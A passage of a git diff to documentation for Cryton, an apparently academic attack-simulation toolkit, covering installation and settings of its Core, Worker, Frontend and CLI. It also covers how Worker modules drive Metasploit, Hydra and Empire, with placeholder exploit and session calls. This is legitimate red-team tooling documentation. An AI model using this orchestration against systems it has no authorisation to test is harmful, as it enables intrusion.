[here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tags). -Export the $C_VERSION variable to match the desired version: -```shell -export C_VERSION=version -``` - -Next, we download example settings: -```shell -curl -o ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/.env -``` -Update these settings to your needs. - -### Overriding the settings -**NOTICE: This doesn't apply to the Docker Compose installation.** - -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_CORE_DEBUG=false -``` - -## Prerequisites -Install these prerequisites before running Cryton Core. Feel free to use our [Compose configuration](#using-compose-configuration). - -- [PostgreSQL database](https://www.postgresql.org/download/) (optionally, use a [Docker image](https://hub.docker.com/_/postgres)) -- [RabbitMQ server](https://www.rabbitmq.com/download.html) (optionally, use a [Docker image](https://hub.docker.com/_/rabbitmq)) -- [PgBouncer](https://www.pgbouncer.org/install.html) (optionally, use a [Docker image](https://hub.docker.com/r/edoburu/pgbouncer)) - -### Using Compose configuration -The easiest way to satisfy the prerequisites is to use our predefined Compose configuration. To do so, you need to -install [Docker Compose](https://docs.docker.com/compose/install/). - -Now, continue to the installation, where you'll find a guide on how to install the prerequisites using Compose: - -- [using pipx](#installation--using-pippipx-) -- [using Docker Compose](#installation--using-docker-compose-) -- [development](#development) - -## Installation (using pip/pipx) -Cryton Core is available in the [PyPI](https://pypi.org/project/cryton-core/) and can be installed using *pip* (`pip install --user cryton-core`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). - -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Install prerequisites for pipx installation using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -cd ~/.local/cryton-core/ -curl -o ~/.local/cryton-core/docker-compose.prerequisites.yml https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/docker-compose.prerequisites.yml -curl -o ~/.local/cryton-core/docker-compose.prerequisites.override.yml https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/docker-compose.prerequisites.override.yml -docker compose -f docker-compose.prerequisites.yml -f docker-compose.prerequisites.override.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=localhost -CRYTON_CORE_DB_HOST=localhost -CRYTON_CORE_DB_PORT=16432 -``` - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-core -``` - -Make sure you've correctly set the [settings](#settings). - -If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. - -Everything should be set. Check out the [usage section](#usage). - -## Installation (using Docker Compose) -Cryton Core can be installed using Docker Compose. - -First, we have to clone the repo and switch to the correct version. -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -git checkout $C_VERSION -``` - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Install prerequisites for Compose deployment using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -docker compose -f docker-compose.prerequisites.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=cryton_rabbit -CRYTON_CORE_DB_HOST=cryton_pgbouncer -``` - -### Installing and running with Docker Compose -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -Finally, copy your settings: -```shell -cp ~/.local/cryton-core/.env .env -``` - -We are now ready to build and start the Core: -```shell -docker compose up -d --build -``` - -After a while you should see a similar output: -``` -[+] Running 6/6 - ⠿ Container cryton_rabbit Started - ⠿ Container cryton_apache Started - ⠿ Container cryton_db Healthy - ⠿ Container cryton_pgbouncer Started - ⠿ Container cryton_app Started - ⠿ Container cryton_listener Started -``` - -Everything should be set. Check if the installation was successful and the Core is running by either installing Cryton CLI or testing REST API -with curl: -``` -curl localhost:8000/api/ -``` - -Expected result: -``` -{"runs":"http://localhost:8000/cryton/api/v1/runs/","plans":"http://localhost:8000/cryton/api/v1/plans/", -"plan_executions":"http://localhost:8000/cryton/api/v1/plan_executions/","stages":"http://localhost:8000/cryton/api/v1/stages/", -"stage_executions":"http://localhost:8000/cryton/api/v1/stage_executions/","steps":"http://localhost:8000/cryton/api/v1/steps/", -"step_executions":"http://localhost:8000/cryton/api/v1/step_executions/","workers":"http://localhost:8000/cryton/api/v1/workers/"} -``` - -Docker can sometimes create dangling (`<none>:<none>`) images which can result in high disk space usage. You can remove them using: -```shell -docker image prune -``` - -## Development -To install Cryton Core for development, you must install [Poetry](https://python-poetry.org/docs/). - -Clone the repository and then go to the correct directory: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -``` - -### Install prerequisites for development using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -docker compose -f docker-compose.prerequisites.yml -f docker-compose.prerequisites.override.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=localhost -CRYTON_CORE_DB_HOST=localhost -CRYTON_CORE_DB_PORT=16432 -``` - -### Installation and setup with Poetry -Now we can install the project: -```shell -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - -Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. - -Everything should be set, check out the [usage section](#usage). - -## Usage -**NOTICE: If you're using Docker Compose to install the app, you don't need to migrate the database or start -the services mentioned in this section.** - -Move to the app directory, since some files and directories can be spawned in a relative path -```shell -cd ~/.local/cryton-core/ -``` - -Use the following to invoke the app: -```shell -cryton-core -``` - -You should see a help page: -``` -Type 'cryton-core help <subcommand>' for help on a specific subcommand. - -Available subcommands: -... -``` - -**To learn about each command's options use**: -```shell -cryton-core help <your command> -``` - -Before we do anything, **we need to migrate the database**: -```shell -cryton-core migrate -``` - -To be able to use Cryton Core, we need to start the application and its RabbitMQ listener (start each in a separate shell or use the `nohup` command). - -First, **start the application**: -```shell -cryton-core runserver 0.0.0.0:8000 -``` - -Use the Gunicorn server for the production deployment: -```shell -cryton-core startgunicorn -``` - -**Start the RabbitMQ listener**: -```shell -cryton-core startlistener -``` - -### REST API and control -REST API is the only way to communicate with Cryton Core. It is by default running at -[http://0.0.0.0:8000](http://0.0.0.0:8000). Interactive documentation can be found at -[http://0.0.0.0:8000/doc](http://0.0.0.0:8000/doc). - -To be able to control Cryton Core, you have to send requests to its REST API. This can be done manually, or via -[Cryton CLI](cli.md) or -[Cryton Frontend](frontend.md). - -### Execution example -Every Run can be described by a simple formula: -``` -Plan template + inventory = Plan instance -Plan instance + Worker = Plan execution -Plan instance + Workers = Run -``` - -**1. Choose or design plan template** -Choose one of the YAML plan templates (in the `examples` directory) or design your own. - -**2. Create Plan instance** -Plan templates can utilize a number of variables that need to be provided during the instantiation process. Do this by -specifying an inventory file. - -**3. Create Worker** -Define Worker(s) that will be used to execute the Plan instance. - -**4. Create Run** -Create a Run by choosing the Plan instance and providing a list of Workers for execution. - -**5. Schedule or execute Run** -You can either schedule Run for a specific date/time, or execute it directly. Run will then be executed on every -Worker simultaneously. - -**6. Read Run Report** -A report can be generated anytime during the execution (also compliant with YAML format). It contains a list of -Stages/Steps and their results. diff --git a/docs/2022.2/starting-point/frontend.md b/docs/2022.2/starting-point/frontend.md deleted file mode 100644 index 17c03a391fae0aa0aabae69f2983d701fd9bb813..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/frontend.md +++ /dev/null @@ -1,92 +0,0 @@ -## Description -Cryton Frontend is a graphical interface used to interact with [Cryton Core](core.md) (its API). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -and **[Cryton Worker](worker.md)** tools. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-frontend). - -## Settings -Before installation, you need to set the environment variables to match **Cryton Core** settings. Environment variables -can be found in `src/environments/`. For production build, modify the _environment.prod.ts_ file, else modify the _environment.ts_ file. - -**crytonRESTApiHost:** REST API host (localhost by default). - -**crytonRESTApiPort:** REST API port (8000 by default). - -**refreshDelay:** Sets artificial delay in milliseconds for refresh API requests, users usually react better if the -requests don't happen instantly, but they can see a tiny bit of loading. Initial API request doesn't use delay, -this is only for refreshing data (300 milliseconds by default). - -## Installation (using Docker Compose) -Cryton Frontend can be installed using Docker Compose. - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Installing and running with Docker Compose -First, we have to clone the repo and switch to the correct version (if you haven't already). -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git -cd cryton-frontend -``` - -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -We are now ready to build and start the frontend: -```shell -docker compose up -d --build -``` - -Docker Compose will automatically build the app for production with minimal dependencies and deploy it on a Nginx -server inside the container. The default port is set to **8080**, you can change this setting in the `docker-compose.yml` file. - -## Installation (manual) - -### Requirements -- [npm](https://nodejs.org/en/) - -### Installing manually using npm - -1. Clone this repository and cd into it. -2. Run `npm install`, npm will take care of installing all the dependencies. -3. Based on the needs you can: - - Serve the app by running `ng serve` or `ng serve --prod` for production settings. - - Only use `ng serve` for development/testing, in a real production environment use either docker installation or - production build deployed on a production-ready web server (for example Nginx). - - App will now be available on **localhost:4200** - - To change the port use argument `--port [port]` - - Build the app by running `npm run build` or `npm run build-prod` for production. - - You can find the build in the **/dist** folder. - -## Development - -### Requirements -- [npm](https://nodejs.org/en/) - -### Installing and running with npm - -- App uses husky to run pre-commit hooks. These include: - - Code formatting with Prettier. - - Linting with ESLint. - - Running unit tests with Karma. -- To start development: - 1. Install dependencies with `npm install`. - 2. Run `npm start` to run the development server. The app will now listen for changes and refresh itself on every change in the project's filesystem. - -## Usage -**Please keep in mind that the [Cryton Core](core.md) -must be running and its API must be reachable.** - -Use in-app help pages to learn about usage. diff --git a/docs/2022.2/starting-point/modules.md b/docs/2022.2/starting-point/modules.md deleted file mode 100644 index 9cdbe43ad42ce93e46526ec72e87cd9ef322600e..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/modules.md +++ /dev/null @@ -1,21 +0,0 @@ -## Description -Cryton (attack) modules is a collection of Python scripts with the goal of orchestrating known offensive security tools -(Nmap, Metasploit, THC Hydra, etc.). Although this is their intended purpose, they are still Python scripts, and therefore -any custom-made script can be used similarly. - -Attack modules get executed inside Step objects using [Cryton Worker](worker.md). -All provided arguments are given to the Attack module. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -More detailed modules' description can be found [here](../modules/howto-create-attack-modules.md). - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-modules). - -## Usage -**Before you download the modules or once you clone the repository, please make sure to choose the correct version (`git checkout <version>`).** - -As mentioned, modules are primarily targeted for use with Cryton Worker. See how to set them up [here](worker.md#setting-up-modules). - -Since they are python modules, you can install and use them manually. You should use a virtual environment like [Poetry](https://python-poetry.org/docs/). diff --git a/docs/2022.2/starting-point/worker.md b/docs/2022.2/starting-point/worker.md deleted file mode 100644 index 30b1965853a42db4cc6ab78bdd21047f21c7b264..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/worker.md +++ /dev/null @@ -1,393 +0,0 @@ -## Description -Cryton Worker is used for executing attack modules remotely. It utilizes [RabbitMQ](https://www.rabbitmq.com/) -as its asynchronous remote procedures call protocol. It connects to the Rabbit MQ server and consumes messages from -the Core component or any other app that implements its [RabbitMQ API](../interfaces/worker-rabbit-api#rabbit-api). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -(or your custom tool that implements Worker's API). -Modules provided by Cryton can be found [here](https://gitlab.ics.muni.cz/cryton/cryton-modules). - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-worker). - -## Settings -Cryton Worker uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|------------------------------------|---------|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_WORKER_NAME | string | my_worker1 | Unique name used to identify the Worker. | -| CRYTON_WORKER_MODULES_DIR | string | /path/to/cryton-modules/modules/ | Path to the directory containing the modules. | -| CRYTON_WORKER_DEBUG | boolean | false | Make Worker run with debug output. | -| CRYTON_WORKER_INSTALL_REQUIREMENTS | boolean | true | Install requirements.txt for each module on startup. | -| CRYTON_WORKER_CONSUMER_COUNT | int | 7 | Number of consumers used for Rabbit communication <br> (more equals faster request processing and heavier processor usage). | -| CRYTON_WORKER_PROCESSOR_COUNT | int | 7 | Number of processors used for internal requests <br> (more equals faster internal requests processing, but heavier processor usage). | -| CRYTON_WORKER_MAX_RETRIES | int | 3 | How many times to try to re-connect when the connection is lost. | -| CRYTON_WORKER_MSFRPCD_HOST | str | localhost | Metasploit Framework RPC host. | -| CRYTON_WORKER_MSFRPCD_PORT | int | 55553 | Metasploit Framework RPC port. | -| CRYTON_WORKER_MSFRPCD_SSL | boolean | true | Use SSL to connect to Metasploit Framework RPC. | -| CRYTON_WORKER_MSFRPCD_USERNAME | string | msf | Username for Metasploit Framework RPC login. | -| CRYTON_WORKER_MSFRPCD_PASSWORD | string | toor | Password for Metasploit Framework RPC login. | -| CRYTON_WORKER_RABBIT_HOST | string | 127.0.0.1 | RabbitMQ server host. | -| CRYTON_WORKER_RABBIT_PORT | int | 5672 | RabbitMQ server port. | -| CRYTON_WORKER_RABBIT_USERNAME | string | admin | Username for RabbitMQ server login. | -| CRYTON_WORKER_RABBIT_PASSWORD | string | mypass | Password for RabbitMQ server login. | -| CRYTON_WORKER_EMPIRE_HOST | string | 127.0.0.1 | Empire server host. | -| CRYTON_WORKER_EMPIRE_PORT | int | 1337 | Empire server port. | -| CRYTON_WORKER_EMPIRE_USERNAME | string | empireadmin | Username for Empire server login. | -| CRYTON_WORKER_EMPIRE_PASSWORD | string | password123 | Password for Empire server login. | -| CRYTON_WORKER_APP_DIRECTORY | string | ~/.local/cryton-worker/ | Path to the Cryton Worker directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-worker/ -``` - -The directory will be also used to store logs and other data created by Cryton Worker. -**This doesn't apply to the Docker installation.** It will be available in the same directory as the Dockerfile -(`/path/to/cryton-worker/cryton-worker`). - -Next, we download example settings (**change the version to match the app version - versions can be found [here](https://gitlab.ics.muni.cz/cryton/cryton-worker/-/tags)**): -```shell -curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/<version>/.env -``` -Update these settings to your needs. - -### Overriding the settings -**NOTICE: This doesn't apply to the Docker Compose installation.** - -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_WORKER_NAME=my_worker1 -``` - -Some environment variables can be overridden in CLI. Try using `cryton-worker --help`. - -### Setting up modules -To be able to **execute** (validate) **attack modules** you must download them into one directory. Then update -`CRYTON_WORKER_MODULES_DIR` environment variable to point to the correct location. If you're using the provided modules -from the [modules' repository](https://gitlab.ics.muni.cz/cryton/cryton-modules), then the variable -will look similar to this `CRYTON_WORKER_MODULES_DIR=/path/to/cryton-modules/modules/`. - -Modules are hot-swappable, which means the modules don't have to be present at startup. -This is especially useful for development but **not recommended for production**. - -Modules directory example: -``` -tree $CRYTON_WORKER_MODULES_DIR -CRYTON_WORKER_MODULES_DIR/ -├── mod_hydra -│ └── mod.py -└── mod_cmd - └── mod.py -``` - -## Prerequisites -Worker can run without these prerequisites. However, they are **highly recommended** since they allow Worker to use all of its functionality. -- [Metasploit Framework](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) allows using Metasploit sessions and MSF listeners. -- [Empire post-exploitation framework](https://bc-security.gitbook.io/empire-wiki/quickstart/installation) allows deployment and interaction with Empire agents. - -Additionally, to start the MSF as a service follow [this guide](https://docs.rapid7.com/metasploit/running-metasploit-remotely/) or simply use: -```shell -msfrpcd -U <CRYTON_WORKER_MSFRPCD_USERNAME> -P <CRYTON_WORKER_MSFRPCD_PASSWORD> -``` - -## Installation (using pip/pipx) -Cryton Worker is available in the [PyPI](https://pypi.org/project/cryton-worker/) and can be installed using *pip* (`pip install --user cryton-worker`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). - -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-worker -``` - -Make sure you've correctly set the [settings](#settings). - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set. Check out the [usage section](#usage). - -## Installation (using Docker Compose) -Cryton Worker can be installed using Docker Compose. - -To allow the Worker to start listeners, the container has raw access to the host’s network interface. - -**This guide won't describe how to install or mount the tools/applications used by the (attack) modules.** -More information can be found in the [Docker documentation](https://docs.docker.com/storage/volumes/). - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Installing and running with Docker Compose -First, we have to clone the repo and switch to the correct version. -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git -cd cryton-worker -git checkout <version> -``` - -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -Finally, copy your settings: -```shell -cp ~/.local/cryton-worker/.env .env -``` - -We are now ready to build and start the Worker: -```shell -docker compose up -d --build -``` - -After a while you should see a similar output: -``` -[+] Running 1/1 - ⠿ Container cryton_worker Started -``` - -Everything should be set. Check if the installation was successful and the Worker is running: -```shell -docker compose logs -``` -You should see `[*] Waiting for messages.` in the output. - -Docker can sometimes create dangling (`<none>:<none>`) images which can result in high disk space usage. You can remove them using: -```shell -docker image prune -``` - -## Development -To install Cryton Worker for development, you must install [Poetry](https://python-poetry.org/docs/). - -Clone the repository: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git -``` - -Then go to the correct directory and install the project: -```shell -cd cryton-worker -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - -Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -Optionally, you can set up [shell completion](#shell-completion) - -Everything should be set, check out the [usage section](#usage). - -## Usage -**NOTICE: If you're using Docker Compose to install the app, you can skip this section.** - -Use the following to invoke the app: -```shell -cryton-worker -``` - -You should see a help page: -``` -Usage: cryton-worker [OPTIONS] COMMAND [ARGS]... - - Cryton Worker CLI. - -Options: - ... -``` - -**To learn about each command's options use**: -```shell -cryton-worker <your command> --help -``` - -To start Worker use `cryton-worker start` and you should see something like: -``` -Starting Worker <Worker name>.. -To exit press CTRL+C -Connection does not exist. Retrying.. -Connection to RabbitMQ server established. -[*] Waiting for messages. -``` - -## Executing modules -To be able to execute a module (Python script), it must have the following structure and IO arguments. - -### Modules' structure -- Each module must have its own directory with its name. -- Script (module) must be called `mod.py`. -- Module must contain an `execute` function that takes a dictionary and returns a dictionary. It's an entry point for executing it. -- Module should contain a `validate` function that takes a dictionary, validates it, and returns 0 if it's okay, else raises an exception. - -Path example: -`/CRYTON_WORKER_MODULES_DIR/my-module-name/mod.py` - -Where: -- **CRYTON_WORKER_MODULES_DIR** has to be the same path as is defined in the *CRYTON_WORKER_MODULES_DIR* variable. -- **my-module-name** is the directory containing your module. -- **mod.py** is the module file. - -Module (`mod.py`) example: -```python -def validate(arguments: dict) -> int: - if arguments != {}: - return 0 # If arguments are valid. - raise Exception("No arguments") # If arguments aren't valid. - -def execute(arguments: dict) -> dict: - # Do stuff. - return {"return_code": 0, "serialized_output": ["x", "y"]} - -``` - -### Input parameters -Every module has its own input parameters. These input parameters are given as a dictionary to the -module `execute` (when executing the module) or `validate` (when validating the module parameters) function. - -### Output parameters -Every attack module (its `execute` function) returns a dictionary with the following keys: - -| Parameter name | Parameter meaning | -|---------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `return_code` | Numeric representation of result (0, -1, -2). <br />0 (OK) means the module finished successfully.<br />-1 (FAIL) means the module finished unsuccessfully.<br />-2 (ERROR) means the module finished with an unhandled error. | -| `serialized_output` | Parsed output of the module. Eg. for a bruteforce module, this might be a list of found usernames and passwords. | | -| `output` | Raw output of the module | - -## Prebuilt functionality for modules -Worker provides prebuilt functionality to make building modules easier. Import it using: -```python -from cryton_worker.lib.util import module_util -``` - -It gives you access to: -### Metasploit -Wrapper for *MsfRpcClient* from *[pymetasploit3](https://github.com/DanMcInerney/pymetasploit3)*. -Examples: -```python -# Check if the connection to msfrpcd is OK before doing anything. -from cryton_worker.lib.util.module_util import Metasploit -msf = Metasploit() -if msf.is_connected(): - msf.do_stuff() -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -search_criteria = {"via_exploit": "my/exploit"} -found_sessions = Metasploit().get_sessions(**search_criteria) -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -output = Metasploit().execute_in_session("my_command", "session_id") -``` - -```python -from cryton_worker.lib.util.module_util import Metasploit - -options = {"exploit_arguments": {}, "payload_arguments": {}} -Metasploit().execute_exploit("my_exploit", "my_payload", **options) -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -token = Metasploit().client.add_perm_token() -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -output = Metasploit().get_parameter_from_session("session_id", "my_param") -``` - -### get_file_binary -Function to get a file as binary. -Example: -```python -from cryton_worker.lib.util.module_util import get_file_binary -my_file_content = get_file_binary("/path/to/my/file") -``` - -### File -Class used with *[schema](https://pypi.org/project/schema/)* for validation if file exists. -Example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import File -schema = Schema(File(str)) -schema.validate("/path/to/file") -``` - -### Dir -Class used with *[schema](https://pypi.org/project/schema/)* for validation if directory exists. -Example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import Dir -schema = Schema(Dir(str)) -schema.validate("/path/to/directory") -``` - -## Shell completion -Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled (**the tool must be installed first**). - -### Bash -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-worker/ -``` - -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=bash_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.bash -``` - -Source the file in the `~/.bashrc` file: -```shell -echo ". ~/.local/cryton-worker/cryton-worker-complete.bash" >> ~/.bashrc -``` - -You may need to restart your shell for the changes to take effect. - -### Zsh -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-worker/ -``` - -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=zsh_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.zsh -``` - -Source the file in the `~/.zshrc` file: -```shell -echo ". ~/.local/cryton-worker/cryton-worker-complete.zsh" >> ~/.zshrc -``` - -You may need to restart your shell for the changes to take effect. - -### Fish -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=fish_source cryton-worker > ~/.config/fish/completions/cryton-worker-complete.fish -``` - -You may need to restart your shell for the changes to take effect. diff --git a/docs/acknowledgements.md b/docs/acknowledgements.md index d4497c44edfe25eec4ecbb17ae1683048bba172f..a7d45c99d81093c2dbf683d0b986b6a194cf064c 100644 --- a/docs/acknowledgements.md +++ b/docs/acknowledgements.md @@ -2,5 +2,5 @@ Several research activities helped us to create this open-source project. The of | | | | |-|-|-| -|  | This research was supported by the Security Research Programme of the Czech Republic 2015-2022 (BV III/1 - VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20202022133 - Breach Emulation and Attack Simulation Toolkit (BEAST)](https://www.muni.cz/en/research/projects/49127) | -|  | This research was supported by the Security Research Programme of the Czech Republic 2015–2020 (BV III/1 – VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20162019014 – Simulation, detection, and mitigation of cyber threats endangering critical infrastructure](https://www.muni.cz/en/research/projects/31984). | +|  | This research was supported by the Security Research Programme of the Czech Republic 2015-2022 (BV III/1 - VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20202022133 - Breach Emulation and Attack Simulation Toolkit (BEAST)](https://www.muni.cz/en/research/projects/49127){target="_blank"} | +|  | This research was supported by the Security Research Programme of the Czech Republic 2015–2020 (BV III/1 – VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20162019014 – Simulation, detection, and mitigation of cyber threats endangering critical infrastructure](https://www.muni.cz/en/research/projects/31984){target="_blank"}. | diff --git a/docs/architecture.md b/docs/architecture.md new file mode 100644 index 0000000000000000000000000000000000000000..f1931d8e6156fe4a45ff7266b6d35e6b91064ca2 --- /dev/null +++ b/docs/architecture.md @@ -0,0 +1,78 @@ + + +## Core +The main functionality is implemented in [Cryton Core](components/core.md). As the name suggests, this is the core component of the Cryton toolset. +It gives you the ability to create and control attack plans, generate reports, and control Workers. + +!!! note "" + + To issue commands use the provided [REST API](interfaces/core-rest-api.md). + +## CLI and Frontend +There are two ways to interact with Cryton or, more precisely, utilize its REST API. + +One of them is [Cryton CLI](components/cli.md), which allows a simple way to run (automate) actions from the terminal. + +A slightly more user-friendly is [Cryton Frontend](components/frontend.md), a graphical web interface providing additional +functionality to improve the user experience. + +!!! note "" + + There is also the option to develop a custom application that will send requests to Core's [REST API](interfaces/core-rest-api.md). + +## Worker +[Cryton Worker](components/worker.md) is a component for executing attack modules remotely. It utilizes RabbitMQ as its asynchronous remote +procedures call protocol. It connects to the RabbitMQ server and consumes messages from the Core component or any other +app that implements its [Rabbit API](interfaces/worker-rabbit-api.md). + +## Modules +[Cryton modules](components/modules.md) is a collection of scripts that allow the orchestration of some known offensive security tools such as Metasploit. +For example, we can have the Nmap module that implements the scanning capabilities of the Nmap tool, serializes the evidence, and evaluates its results. + +!!! note "" + + You can [develop](development/modules.md) modules according to your needs. + +--- + +## Do I need to have all components installed? +Depending on your use case, the composition of Cryton may vary. For example, installing the Frontend is unnecessary if +you wish to control Cryton using only the CLI. +However, for most use cases, you will install the main components (CLI, Core, Worker, and modules). + +--- + +## Technological decisions +The next section tries to explain the choices for currently employed technologies. Please take into account that these +technologies are not supposed to be final and unchangeable. They just appeared to be best suited for the task at the +time of development, they may change in the future. + +### APScheduler +This was the first choice made for the scheduler module. It allows you to schedule a Python method on a specific time or day or even interval. +It is pretty lightweight and does not need much in terms of resources or capacity. So far we have not found anything better suited for the task. + +### Django ORM +In the beginning, Cryton used the SQLite database with direct access. That changed as SQLite is not good with scaling +for the future. The second choice was PostgreSQL, which stayed to this day, but it was updated with the use of the Django ORM. +Using the Django REST framework for the REST interface also emerged from this choice. + +### Rabbit MQ +For developing Master-Worker architecture, where you can issue commands remotely, we needed some kind of RPC. Although, +as experience showed us, we also needed it to be asynchronous. That's why we chose a messaging broker RabbitMQ. + +### Metasploit +I guess everyone in the IT security field has heard about the Metasploit framework. It is one of the most complete and usable +open-source attack tools available. Of course, Cryton uses it for some attack modules - the majority of simulated attacks +in CDXs usually do use Metasploit in some way. But its attacking capabilities are not the only reason to use it. Its +real advantage is Metasploit's session management. Every time you open a session to some machine it stores it under +a specific ID which you can later use to communicate with the target. This is one of the main features you can use while +executing your attack scenario in Cryton. + +### Empire +For post-exploitation attacks, we decided to add support for an open-source project called Empire. Empire is +a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3 Linux/OS X agents, and C# agents. +The framework offers cryptological-secure communications and flexible architecture. This is done via asynchronous +communication between our Worker component and an Empire c2 server. + +### Docker (compose) +To bundle everything together and make the deployment effortless, we use Docker or Docker Compose configurations. diff --git a/docs/components/cli.md b/docs/components/cli.md new file mode 100644 index 0000000000000000000000000000000000000000..41a843795627b5be70a91b7837f5c51866f7f933 --- /dev/null +++ b/docs/components/cli.md @@ -0,0 +1,286 @@ +## Description +Cryton CLI is a command line interface used to interact with [Cryton Core](core.md) (its API). + +[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-cli){target="_blank"}. + +## Settings +Cryton CLI uses environment variables for its settings. Please update them to your needs. + +### Overriding settings +To override the settings, use the `export` command: +```shell +export CRYTON_CLI_API_HOST=127.0.0.1 +``` + +!!! note "" + + Use `unset` to remove a variable. + +!!! tip "" + + Some settings can be overridden using the CLI. Try using: + ``` + cryton-cli --help + ``` + +??? tip "Overriding settings permanently" + + <div id="settings-permanent"></div> + + First, make 